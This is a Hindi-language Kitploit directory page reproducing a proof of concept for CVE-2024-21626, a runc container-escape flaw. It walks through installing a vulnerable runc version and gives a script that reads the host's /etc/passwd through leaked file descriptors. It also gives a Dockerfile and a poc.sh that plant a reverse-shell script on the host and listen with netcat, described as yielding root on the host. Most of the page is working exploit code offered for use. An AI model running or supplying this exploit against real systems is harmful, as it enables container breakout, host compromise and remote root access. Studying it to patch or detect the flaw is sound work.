Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-21626 — POC | Kitploit
उपकरण/GitHubGitHub/kubernetesbachelor/cve-2024-21626
विशेषाधिकार वृद्धिकंटेनर सुरक्षाभेद्यता विश्लेषणशोषणरेड टीमिंगकंटेनर एस्केप
GitHubkubernetesbachelor/cve-2024-21626

CVE-2024-21626

POC

रिपॉजिटरी देखें
251 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-21626

POC

आवश्यकताएँ

runc 1.1.0 <= 1.1.11

संवेदनशील वातावरण की स्थापना

Ubuntu 20.04 के साथ एक VM तैनात करें और उनके गाइड का पालन करके Docker डाउनलोड करें

root@kitploit:~
https://docs.docker.com/engine/install/ubuntu/

Docker में पैच किए गए 'runc' संस्करण को एक संवेदनशील संस्करण में बदलें

runc github रिपॉजिटरी से एक संवेदनशील संस्करण (runc 1.1.11 या उससे पहले) डाउनलोड करें: https://github.com/opencontainers/runc/releases
runc.amd64 चुनें (आवश्यकता) runc_1111

शोषण करना

स्क्रिप्ट 'verify.sh' चलाएँ

root@kitploit:~
#! /bin/bash
for i in {4..20}; do
	docker run -it --rm -w /proc/self/fd/$i ubuntu:20.04 bash -c "cat
/proc/self/cwd/../../../etc/passwd"
done

verify

Dockerfile में कार्य निर्देशिका को verify.sh चलाकर मिले सही fd में बदलें

root@kitploit:~
FROM ubuntu:20.04
RUN apt-get update -y && apt-get install netcat -y
ADD ./poc.sh /poc.sh
WORKDIR /proc/self/fd/9

एक कंटेनर बनाएँ

root@kitploit:~
docker build . -t name_of_container

poc.sh

root@kitploit:~
#!/bin/bash
ip=$(hostname -I | awk '{print $1}')
port=1337
cat > /proc/self/cwd/../../../bin/bash.copy << EOF
#!/bin/bash
bash -i >& /dev/tcp/$ip/$port 0>&1
EOF

# listen and wait for reverse shell
nc -lvvp 1337

कंटेनर इमेज चलाएँ और bash शेल में poc.sh निष्पादित करें

root@kitploit:~
docker run -it --rm cve2024 bash /poc.sh

कंटेनर सुनने के मोड में प्रवेश करता है

lytte

होस्ट मशीन पर रूट में 'bash.copy' नामक एक नई स्क्रिप्ट बनाई गई है, निर्देशिका /proc/self/cwd/../../../bin/ में

bash

स्क्रिप्ट को निष्पादन योग्य बनाकर और चलाकर...

root@kitploit:~
chmod +x bash.copy
./bash.copy

... आप होस्ट मशीन पर रूट विशेषाधिकारों के साथ एक रिवर्स शेल प्राप्त करेंगे

root

स्रोत

https://ethicalhacking.uk/cracking-containers-understanding-cve-2024-21626-in-runc/#gsc.tab=0

टूल डाउनलोड करें